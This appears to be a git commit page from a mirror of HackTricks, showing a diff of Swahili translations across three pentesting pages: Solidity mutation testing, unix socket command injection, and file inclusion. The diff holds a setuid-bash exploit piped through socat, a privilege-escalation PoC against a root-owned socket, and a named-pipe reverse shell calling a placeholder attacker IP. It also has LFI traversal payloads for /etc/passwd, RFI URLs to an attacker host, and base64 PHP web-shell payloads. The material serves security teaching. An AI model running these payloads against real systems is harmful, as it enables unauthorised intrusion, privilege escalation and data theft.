maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/linux-hardening/privilege-escalation/socket-command

Browse Source
This commit is contained in:
Translator 2025-10-01 09:28:28 +00:00
parent 138a8c016a
commit 068ed2294f
3 changed files with 254 additions and 215 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
src/blockchain/smart-contract-security/mutation-testing-with-slither.md
View File

@ -1,14 +1,14 @@
# Mutation Testing for Solidity with Slither (slither-mutate)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Mutation testing "tests your tests" kwa kuingiza mabadiliko madogo (mutants) kwa njia ya kimfumo katika msimbo wako wa Solidity na kuendesha tena test suite yako. Ikiwa test itashindwa, mutant anaangamizwa. Ikiwa tests bado zinafaulu, mutant ataishi, ikifunua doa la giza kwenye test suite yako ambalo line/branch coverage haiwezi kugundua.
Mutation testing "tests your tests" kwa kuingiza mabadiliko madogo (mutants) kwa mfumo katika code yako ya Solidity na kuendesha tena test suite yako. Ikiwa test itashindwa, mutant anaangamizwa. Ikiwa tests bado zinafaulu, mutant huishi, ikifichua pengo la upofu katika test suite yako ambalo line/branch coverage haiwezi kugundua.
Wazo kuu: Coverage inaonyesha msimbo uliendeshwa; mutation testing inaonyesha kama tabia imethibitishwa kwa kweli.
Wazo muhimu: Coverage inaonyesha code ilitekelezwa; mutation testing inaonyesha ikiwa tabia kwa kweli imethibitishwa.
## Kwa nini coverage inaweza kudanganya
Fikiria ukaguzi huu rahisi wa kizingiti:
Fikiria ukaguzi huu rahisi wa kikomo:
```solidity
function verifyMinimumDeposit(uint256 deposit) public returns (bool) {
if (deposit >= 1 ether) {
@ -18,99 +18,99 @@ return false;
}
}
```
Majaribio ya kitengo yanayochunguza tu thamani chini ya na thamani juu ya kikomo yanaweza kufikia 100% ya coverage ya mistari/matawi wakati yakishindwa kuthibitisha ukomo wa usawa (==). Urekebishaji kuwa `deposit >= 2 ether` bado ungefanya majaribio hayo yapite, ukivunja kimya kimya mantiki ya protocol.
Unit tests ambazo zinachek tu thamani chini na thamani juu ya kizingiti zinaweza kufikia 100% line/branch coverage huku zikishindwa kuthibitisha mpaka wa usawa (==). Refactor kuwa `deposit >= 2 ether` bado ingepita mitihani hiyo, ikivunja mantiki ya protocol bila kuonekana.
Mutation testing inaonyesha pengo hili kwa kubadilisha sharti na kuthibitisha majaribio yako yanashindwa.
Mutation testing inaonyesha pengo hili kwa kubadilisha condition na kuthibitisha kwamba mitihani yako inashindwa.
## Vigezo vya mutation vya kawaida katika Solidity
## Operator za mutation za kawaida za Solidity
Slithers mutation engine inatekeleza mabadiliko madogo mengi yanayobadilisha semantiki, kama vile:
- Ubadilishaji wa operator: `+``-`, `*``/`, etc.
- Ubadilishaji wa assignment: `+=``=`, `-=``=`
- Ubadilishaji wa constant: non-zero → `0`, `true``false`
- Kukatizwa/kubadilishwa kwa masharti ndani ya `if`/loops
- Kufanya mistari yote kuwa maoni (CR: Comment Replacement)
- Badilisha mstari kwa `revert()`
- Ubadilishaji wa aina za data: mfano, `int128``int64`
Slithers mutation engine inatumia mabadiliko madogo mengi yanayobadilisha semantiki, kama:
- Operator replacement: `+``-`, `*``/`, etc.
- Assignment replacement: `+=``=`, `-=``=`
- Constant replacement: non-zero → `0`, `true``false`
- Condition negation/replacement inside `if`/loops
- Comment out whole lines (CR: Comment Replacement)
- Replace a line with `revert()`
- Data type swaps: e.g., `int128``int64`
Lengo: Uangamize 100% ya mutants waliotengenezwa, au fafanua wale wanaoishi kwa sababu zilizo wazi.
Lengo: Ua 100% ya mutants waliotengenezwa, au toa sababu za wazi kwa wale wanaobaki.
## Kutumia mutation testing na slither-mutate
## Kuendesha mutation testing na slither-mutate
Mahitaji: Slither v0.10.2+.
- Orodhesha chaguzi na mutators:
- List options and mutators:
```bash
slither-mutate --help
slither-mutate --list-mutators
```
- Mfano wa Foundry (rekodi matokeo na uhifadhi log kamili):
- Mfano wa Foundry (rekodi matokeo na uhifadhi logi kamili):
```bash
slither-mutate ./src/contracts --test-cmd="forge test" &> >(tee mutation.results)
```
- Ikiwa hautumii Foundry, badilisha `--test-cmd` na amri unayotumia kuendesha majaribio (mfano, `npx hardhat test`, `npm test`).
- Ikiwa hutoitumia Foundry, badilisha `--test-cmd` na jinsi unavyotekeleza majaribio (kwa mfano, `npx hardhat test`, `npm test`).
Mafaili ya matokeo (artifacts) na ripoti zinahifadhiwa katika `./mutation_campaign` kwa chaguo-msingi. Mutants wasiokamatwa (waliobaki) wanakiliwa huko kwa uchunguzi.
Artifacts na ripoti huhifadhiwa katika `./mutation_campaign` kwa chaguo-msingi. Mutants zisizogunduliwa (zilizo hai) zinakopishwa huko kwa uchunguzi.
### Understanding the output
### Kuelewa matokeo
Mistari ya ripoti yanaonekana kama:
Mistari ya ripoti zinaonekana kama:
```text
INFO:Slither-Mutate:Mutating contract ContractName
INFO:Slither-Mutate:[CR] Line 123: 'original line' ==> '//original line' --> UNCAUGHT
```
- The tag in brackets is the mutator alias (e.g., `CR` = Comment Replacement).
- `UNCAUGHT` means tests passed under the mutated behavior → missing assertion.
- Tagi ndani ya mabano ni jina fupi la mutator (kwa mfano, `CR` = Comment Replacement).
- `UNCAUGHT` ina maana majaribio yalipita chini ya tabia iliyobadilishwa → ukosefu wa uthibitisho.
## Kupunguza wakati wa utekelezaji: ipa kipaumbele mutants zenye athari kubwa
## Kupunguza muda wa utekelezaji: weka kipaumbele mutanti zenye athari
Mutation campaigns can take hours or days. Tips to reduce cost:
- Scope: Start with critical contracts/directories only, then expand.
- Prioritize mutators: If a high-priority mutant on a line survives (e.g., entire line commented), you can skip lower-priority variants for that line.
- Parallelize tests if your runner allows it; cache dependencies/builds.
- Fail-fast: stop early when a change clearly demonstrates an assertion gap.
Kampeni za mutation zinaweza kuchukua masaa au siku. Vidokezo vya kupunguza gharama:
- Scope: Anza na mikataba/direktori muhimu tu, kisha panua.
- Prioritize mutators: Ikiwa mutanti wa kipaumbele juu kwenye mstari anakaa (kwa mfano, mstari mzima umekomentiwa), unaweza kupuuza tofauti zenye kipaumbele cha chini kwa mstari huo.
- Endesha majaribio kwa usawa ikiwa runner yako inaruhusu; tumia cache kwa dependencies/builds.
- Fail-fast: simama mapema wakati mabadiliko yanaonyesha wazi ukosefu wa uthibitisho.
## Triage workflow for surviving mutants
## Mtiririko wa kazi wa triage kwa mutanti waliobaki
1) Inspect the mutated line and behavior.
- Reproduce locally by applying the mutated line and running a focused test.
1) Angalia mstari uliobadilishwa na tabia yake.
- Rudia ndani ya mazingira ya ndani kwa kuingiza mstari uliobadilishwa na kuendesha test iliyojikita.
2) Strengthen tests to assert state, not only return values.
- Add equality-boundary checks (e.g., test threshold `==`).
- Assert post-conditions: balances, total supply, authorization effects, and emitted events.
2) Imarisha majaribio ili yathibishe hali, si tu thamani zinazorejeshwa.
- Ongeza ukaguzi wa mipaka ya usawa (kwa mfano, test threshold `==`).
- Thibitisha masharti ya baada: salio, total supply, athari za idhini, na matukio yaliyotolewa.
3) Replace overly permissive mocks with realistic behavior.
- Ensure mocks enforce transfers, failure paths, and event emissions that occur on-chain.
3) Badilisha mocks zilizoruhusu mno kwa tabia halisi.
- Hakikisha mocks zinafanya enforced transfers, njia za kushindwa, na utoaji wa matukio yanayotokea on-chain.
4) Add invariants for fuzz tests.
- E.g., conservation of value, non-negative balances, authorization invariants, monotonic supply where applicable.
4) Ongeza invariants kwa fuzz tests.
- Kwa mfano, uhifadhi wa thamani, salio zisizo hasi, invariants za idhini, supply monotonic pale inapofaa.
5) Re-run slither-mutate until survivors are killed or explicitly justified.
5) Rerun slither-mutate hadi mutanti waliobaki waondolewe au wathibitishwe wazi.
## Case study: revealing missing state assertions (Arkis protocol)
## Utafiti wa kesi: kufichua ukosefu wa uthibitisho wa hali (Arkis protocol)
A mutation campaign during an audit of the Arkis DeFi protocol surfaced survivors like:
Kampeni ya mutation wakati wa ukaguzi wa protokoli ya Arkis DeFi ilibaini mutanti waliobaki kama:
```text
INFO:Slither-Mutate:[CR] Line 33: 'cmdsToExecute.last().value = _cmd.value' ==> '//cmdsToExecute.last().value = _cmd.value' --> UNCAUGHT
```
Kuongeza maoni (commenting out the assignment) hakukuangusha tests, ikithibitisha ukosefu wa post-state assertions. Sababu ya mzizi: code iliamini `_cmd.value` iliyo chini ya udhibiti wa mtumiaji badala ya kuthibitisha uhamisho halisi wa tokeni. Mshambulizi angeweza kusababisha uhamisho uliotarajiwa kutofautiana na uhamisho halisi ili kumwaga fedha. Matokeo: hatari ya kiwango cha juu kwa uthabiti wa kifedha wa protocol.
Ku-comment out ugawaji hakukuvunja majaribio, ikathibitisha kukosekana kwa post-state assertions. Sababu ya msingi: msimbo uliamini `_cmd.value` inayoendeshwa na mtumiaji badala ya kuthibitisha uhamisho halisi wa tokeni. Mvamizi angeweza kusababisha kutolingana kati ya uhamisho uliotarajiwa na uhalisi ili kuchoma/mkamua fedha. Matokeo: hatari ya kiwango cha juu kwa uendelevu wa protocol.
Mwongozo: Tibu survivors zinazogusa uhamisho wa thamani, uhasibu, au udhibiti wa upatikanaji kama hatari ya juu hadi zitakaposuluhishwa (killed).
Miongozo: Chukulia mabaki yanayoathiri uhamisho wa thamani, uhasibu, au udhibiti wa upatikanaji kama hatari kubwa hadi yatakaposhindwa/kufutwa.
## Orodha ya vitendo
- Endesha kampeni iliyolengwa:
- `slither-mutate ./src/contracts --test-cmd="forge test"`
- Fanya triage ya survivors na andika tests/invariants ambazo zingeanguka chini ya tabia iliyobadilishwa.
- Thibitisha salio, usambazaji, idhini, na matukio.
- Ongeza tests za mipaka (`==`, overflows/underflows, zero-address, zero-amount, empty arrays).
- Badilisha mocks zisizo za kweli; simulate failure modes.
- Rudia hadi mutants zote ziwe killed au zifafanuliwe kwa maoni na mantiki.
- Fanyia triage mabaki na andika tests/invariants zitakazoshindwa chini ya tabia iliyobadilishwa.
- Thibitisha salio, ugavi, idhini, na matukio.
- Ongeza mtihani wa mipaka (`==`, overflows/underflows, zero-address, zero-amount, empty arrays).
- Badilisha mocks zisizo halisi;iga njia za kushindwa.
- Rudia hadi mutants zote zimeshindikana/kufutwa (killed) au zimefafanuliwa kwa maoni na mantiki.
## References
## Marejeo
- [Use mutation testing to find the bugs your tests don't catch (Trail of Bits)](https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/)
- [Arkis DeFi Prime Brokerage Security Review (Appendix C)](https://github.com/trailofbits/publications/blob/master/reviews/2024-12-arkis-defi-prime-brokerage-securityreview.pdf)
- [Slither (GitHub)](https://github.com/crytic/slither)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

45
src/linux-hardening/privilege-escalation/socket-command-injection.md
View File

@ -1,8 +1,10 @@
# Socket Command Injection
{{#include ../../banners/hacktricks-training.md}}
## Mfano wa kuunganisha socket kwa Python
## Mfano wa Socket binding na Python
Katika mfano ufuatao, **socket ya unix inaundwa** (`/tmp/socket_test.s`) na kila kitu **kilichopokelewa** kitakuwa **kinatekelezwa** na `os.system`. Najua huenda usikute hii katika mazingira halisi, lakini lengo la mfano huu ni kuona jinsi msimbo unaotumia socket za unix unavyoonekana, na jinsi ya kudhibiti ingizo katika hali mbaya zaidi.
Katika mfano ufuatao **unix socket imeundwa** (`/tmp/socket_test.s`) na kila kitu **kinachopokelewa** kitatekelezwa na `os.system`. Najua hautakutana na hili kwa urahisi katika mazingira halisi, lakini lengo la mfano huu ni kuona jinsi code inayotumia unix sockets inavyoonekana, na jinsi ya kudhibiti input katika hali mbaya kabisa inayowezekana.
```python:s.py
import socket
import os, os.path
@ -24,15 +26,50 @@ print(datagram)
os.system(datagram)
conn.close()
```
**Teza** msimbo ukitumia python: `python s.py` na **angalia jinsi socket inavyosikiliza**:
**Tekeleza** msimbo kwa kutumia python: `python s.py` na **angalia jinsi socket inavyosikiliza**:
```python
netstat -a -p --unix | grep "socket_test"
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s
```
**Kuvunja**
**Exploit**
```python
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s
```
## Uchambuzi wa kesi: Root-owned UNIX socket signal-triggered escalation (LG webOS)
Baadhi ya privileged daemons hutoa root-owned UNIX socket inayokubali untrusted input na kuunganisha vitendo vya privileged na thread-IDs na signals. Ikiwa protocol inaruhusu unprivileged client kuathiri ni native thread gani inalengwa, unaweza kuweza kusababisha privileged code path na escalate.
Mfano ulioshuhudiwa:
- Unganisha kwenye root-owned socket (mfano, /tmp/remotelogger).
- Tengeneza thread na upate native thread id (TID).
- Tuma TID (packed) pamoja na padding kama request; upokee acknowledgement.
- Toa signal maalum kwa TID hiyo ili ku-trigger privileged behaviour.
Muhtasari mdogo wa PoC:
```python
import socket, struct, os, threading, time
# Spawn a thread so we have a TID we can signal
th = threading.Thread(target=time.sleep, args=(600,)); th.start()
tid = th.native_id # Python >=3.8
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect("/tmp/remotelogger")
s.sendall(struct.pack('<L', tid) + b'A'*0x80)
s.recv(4) # sync
os.kill(tid, 4) # deliver SIGILL (example from the case)
```
Ili kuibadilisha kuwa root shell, muundo rahisi wa named-pipe + nc unaweza kutumika:
```bash
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc <ATTACKER-IP> 23231 > /tmp/f
```
Vidokezo:
- Aina hii ya mdudu hutokea kutokana na kuamini thamani zinazotokana na hali ya mteja isiyo na mamlaka (TIDs) na kuziunganisha kwa signal handlers au mantiki zenye ruhusa.
- Imarisha kwa kusisitiza maelezo ya uthibitisho kwenye socket, kuthibitisha muundo wa ujumbe, na kutenganisha operesheni zenye ruhusa kutoka kwa vitambulisho vya thread vinavyotolewa kutoka nje.
## Marejeleo
- [LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover (SSD Disclosure)](https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass-and-full-device-takeover/)
{{#include ../../banners/hacktricks-training.md}}

318
src/pentesting-web/file-inclusion/README.md
View File

@ -4,14 +4,14 @@
## File Inclusion
**Remote File Inclusion (RFI):** Faili inasomwa kutoka kwa server ya mbali (Bora: Unaweza kuandika msimbo na server itauitekeleza). Katika php hii ni **imezimwa** kwa default (**allow_url_include**).\
**Local File Inclusion (LFI):** Server inapakia faili ya ndani.
Remote File Inclusion (RFI): Faili inapatikana kutoka kwenye server ya mbali (Bora: Unaweza kuandika code na server itaiendesha). Katika php hii imezimwa kwa default (allow_url_include).\
Local File Inclusion (LFI): Server inapakia faili ya ndani.
Udhaifu hutokea wakati mtumiaji anaweza kwa njia fulani kudhibiti faili itakayopakiwa na server.
Udhaifu hutokea wakati mtumiaji anaweza kwa namna fulani kudhibiti faili ambayo server itakuwa inapakia.
Zilizo hatarini **PHP functions**: require, require_once, include, include_once
Vulnerable PHP functions: require, require_once, include, include_once
Chombo kizuri cha ku-exploit udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
Chombo kizuri cha kutumia kufaida udhaifu huu: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## Blind - Interesting - LFI2RCE files
```python
@ -19,17 +19,17 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
```
### **Linux**
**Nimechanganya orodha kadhaa za \*nix LFI na kuongeza njia zaidi, nimeunda hii:**
**Nimetengeneza hii kwa kuchanganya orodha kadhaa za *nix LFI na kuongeza njia zaidi:**
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
{{#endref}}
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuongeza `../../../../../`
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
Orodha inayotumia mbinu kadhaa kutafuta faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
@ -40,22 +40,22 @@ Muungano wa wordlists tofauti:
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
{{#endref}}
Pia jaribu kubadilisha `/` kwa `\`\
Pia jaribu kuondoa `C:/` na kuongeza `../../../../../`
Jaribu pia kubadilisha `/` kwa `\`\
Jaribu pia kuondoa `C:/` na kuongeza `../../../../../`
Orodha inayotumia mbinu mbalimbali kupata faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
Orodha inayotumia mbinu kadhaa kutafuta faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
### **OS X**
Kagua orodha ya LFI ya linux.
Angalia orodha ya LFI ya Linux.
## Misingi ya LFI na bypasses
## Basic LFI and bypasses
Mifano yote ni kwa Local File Inclusion lakini pia inaweza kutumika kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>).
Mifano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)//>).
```
http://example.com/index.php?page=../../../etc/passwd
```
### traversal sequences zilizokatwa bila kurudi kwa msururu
### traversal sequences zimeondolewa bila kutumia rekursia
```python
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
@ -63,59 +63,59 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **Null byte (%00)**
Bypass kuongezwa kwa chars mwishoni mwa string iliyotolewa (bypass of: $\_GET\['param']."php")
Bypass kuongeza herufi zaidi mwishoni mwa mfuatano wa herufi uliotolewa (bypass ya: $\_GET\['param']."php")
```
http://example.com/index.php?page=../../../etc/passwd%00
```
Hii **imetatuliwa tangu PHP 5.4**
### **Kodishaji**
### **Encoding**
Unaweza kutumia kodishaji zisizo za kawaida kama double URL encode (na nyingine):
Unaweza kutumia encodings zisizo za kawaida kama double URL encode (na zingine):
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### Kutoka kwenye folda iliyopo
### Kutoka kwenye folder iliyopo
Labda back-end inakagua njia ya folda:
Labda back-end inakagua folder path:
```python
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Kuchunguza Saraka za Mfumo wa Faili kwenye Server
### Kuchunguza Saraka za Mfumo wa Faili kwenye Seva
Mfumo wa faili wa server unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kuchunguza kuwepo kwa folda maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:
Mfumo wa faili wa seva unaweza kuchunguzwa kwa kurudia (recursively) ili kubaini saraka, si faili tu, kwa kutumia mbinu fulani. Mchakato huu unahusisha kuamua kina cha saraka na kujaribu uwepo wa mafolda maalum. Hapo chini kuna njia ya kina ya kufanikisha hili:
1. **Determine Directory Depth:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili ya `/etc/passwd` (inatumika ikiwa server ni Linux-based). Mfano wa URL unaweza kuundwa kama ifuatavyo, ukiashiria kina cha tatu:
1. **Tambua Kina cha Saraka:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili `/etc/passwd` (inapotumika ikiwa seva inategemea Linux). URL mfano inaweza kuundwa kama ifuatavyo, ikiashiria kina cha tatu:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **Probe for Folders:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi kwa `/etc/passwd`. Ngazi ya directory ya ziada inahitaji kuongeza depth kwa moja:
2. **Probe for Folders:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi `/etc/passwd`. Kiwango cha ziada cha saraka kinahitaji kuongeza depth kwa moja:
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **Tafsiri Matokeo:** Jibu la server linaonyesha kama folda ipo:
- **Error / No Output:** Inawezekana folda `private` haipo mahali ulioletwa.
- **Contents of `/etc/passwd`:** Uwepo wa folda `private` umethibitishwa.
4. **Uchunguzi Rekursivu:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa folda ndogo au faili kwa kutumia mbinu ile ile au mbinu za kawaida za Local File Inclusion (LFI).
3. **Tafsiri Matokeo:** Jibu la server linaonyesha ikiwa folda ipo:
- **Hitilafu / Hakuna Matokeo:** Folda `private` huenda haipo katika eneo lililotajwa.
- **Maudhui ya `/etc/passwd`:** Upo wa folda `private` umethibitishwa.
4. **Uchunguzi Rekursivu:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa ajili ya subdirectories au faili kwa kutumia mbinu ile ile au mbinu za jadi za Local File Inclusion (LFI).
Kwa kuchunguza folda katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina folda `private` (ikiwa current directory iko kwa kina cha 3), tumia:
Kwa kuchunguza folda katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina folda `private` (kwa kuzingatia folda ya sasa iko kwa kina cha 3), tumia:
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Path Truncation Technique**
Path truncation ni mbinu inayotumiwa kubadilisha njia za faili katika maombi ya wavuti. Mara nyingi hutumika kufikia faili zilizozuiliwa kwa kuruka hatua fulani za usalama ambazo zinaongeza alama za ziada mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakapo badilishwa na hatua ya usalama, bado itaelekeza kwenye faili inayotakiwa.
Path truncation ni mbinu inayotumika kubadilisha file paths katika web applications. Mara nyingi hutumika kupata files zilizofungiwa kwa kuruka baadhi ya hatua za usalama zinazoongeza herufi za ziada mwishoni mwa file paths. Lengo ni kuunda file path ambayo, mara itakapobadilishwa na hatua ya usalama, bado itaonyesha file inayotakiwa.
Katika PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuzingatiwa sawa kutokana na asili ya mfumo wa faili. Kwa mfano:
In PHP, uwakilishi mbalimbali wa file path unaweza kuchukuliwa kuwa sawa kutokana na tabia ya file system. Kwa mfano:
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` zote zinachukuliwa kuwa njia moja.
- Wakati herufi 6 za mwisho ni `passwd`, kuongezea a `/` (kufanya `passwd/`) hakubadilishi faili inayolengwa.
- Vivyo vivyo, ikiwa `.php` inaongezwa kwenye njia ya faili (kwa mfano `shellcode.php`), kuongeza `/.` mwishoni haitabadilishi faili inayofikiwa.
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` zote huchukuliwa kuwa path ileile.
- When the last 6 characters are `passwd`, appending a `/` (making it `passwd/`) doesn't change the targeted file.
- Similarly, if `.php` is appended to a file path (like `shellcode.php`), adding a `/.` at the end will not alter the file being accessed.
Mifano iliyopewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na maudhui yake nyeti (taarifa za akaunti za watumiaji):
Mifano iliyotolewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na yaliyomo hatarishi (taarifa za akaunti za watumiaji):
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
@ -125,17 +125,17 @@ http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa seva.
Katika senario hizi, idadi ya traversals zinazohitajika inaweza kuwa karibu 2027, lakini namba hii inaweza kutofautiana kulingana na usanidi wa server.
- **Using Dot Segments and Additional Characters**: Mfululizo wa traversal (`../`) ukichanganywa na sehemu za dot za ziada na herufi unaweza kutumika kuvinjari mfumo wa faili, kwa ufanisi kupuuza mnyororo uliowekwa na seva.
- **Determining the Required Number of Traversals**: Kupitia jaribio na makosa, mtu anaweza kupata idadi kamili ya mfululizo wa `../` zinazohitajika kufika kwa directory ya mzizi na kisha kwa `/etc/passwd`, kuhakikisha kwamba nyongeza yoyote iliyowekwa (kama `.php`) inafutwa lakini njia inayotakiwa (`/etc/passwd`) inabaki sawa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza njia na directory isiyo ya kweli (kama `a/`). Mbinu hii hutumika kama tahadhari au kutimiza mahitaji ya mantiki ya seva ya kuchanganua njia.
- **Using Dot Segments and Additional Characters**: Traversal sequences (`../`) pamoja na dot segments za ziada na characters zinaweza kutumika kuvinjari mfumo wa faili, huku zikifanya server ipuuze nyongeza (kama `.php`) zilizoongezwa.
- **Determining the Required Number of Traversals**: Kwa jaribio na makosa, mtu anaweza kupata idadi sahihi ya `../` inayohitajika kufika kwenye root directory kisha `/etc/passwd`, akiweka uhakika kwamba nyongeza zozote (kama `.php`) zimefanywa zisifanye kazi lakini path inayotakiwa (`/etc/passwd`) inabaki isiyoharibiwa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza path na directory isiyokuwepo (kama `a/`). Mbinu hii hutumika kama tahadhari au kutimiza mahitaji ya mantiki ya server katika kuchambua path.
Unapotumia path truncation techniques, ni muhimu kuelewa tabia ya seva ya kuchanganua njia na muundo wa filesystem. Kila hali inaweza kuhitaji mbinu tofauti, na mara nyingi upimaji unahitajika kugundua mbinu yenye ufanisi zaidi.
When employing path truncation techniques, ni muhimu kuelewa tabia ya server katika kuchambua path na muundo wa mfumo wa faili. Kila senario inaweza kuhitaji mbinu tofauti, na mara nyingi majaribio yanahitajika ili kugundua njia yenye ufanisi zaidi.
**Udhaifu huu ulirekebishwa katika PHP 5.3.**
### **Njia za kuzunguka kichujio**
### **Filter bypass tricks**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
@ -145,45 +145,45 @@ http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion
Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inapaswa kuwa **On** ili ifanye kazi, na katika kesi hiyo unaweza kujumuisha faili ya PHP kutoka kwenye server yako na kupata RCE:
Katika php hili limezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inapaswa kuwa **On** ili lifanye kazi, na katika hali hiyo unaweza kujumuisha faili ya PHP kutoka kwenye seva yako na kupata RCE:
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP ina **filtering** ya upatikanaji wa kurasa za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol pamoja na base64 ili ku-decoda msimbo wa PHP wa b64 na kupata RCE:
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP iko kwenye **filtering** ya upatikanaji wa kurasa za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol pamoja na base64 ku-decode msimbo wa PHP wa b64 na kupata RCE:
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
> [!TIP]
> Katika code iliyotangulia, `+.txt` ya mwisho iliongezwa kwa sababu mshambulizi alihitaji string ambayo ilihitimisha kwa `.txt`, kwa hivyo string inahitimisha nayo na baada ya b64 decode sehemu hiyo itarudisha takataka tu na PHP code halisi itajumuishwa (na kwa hiyo, itatekelezwa).
> Katika msimbo uliopita, `+.txt` ya mwisho iliongezwa kwa sababu mshambuliaji alihitaji string iliyomalizika na `.txt`, hivyo string inamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha tu takataka na PHP halisi itajumuishwa (na kwa hivyo, itatekelezwa).
Mfano mwingine **usiotumia `php://` protocol** ungekuwa:
Mfano mwingine **kutokutumia `php://` protocol** ungekuwa:
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
## Elementi ya Root ya Python
## Python Kipengele cha mzizi
Katika Python, katika msimbo kama huu:
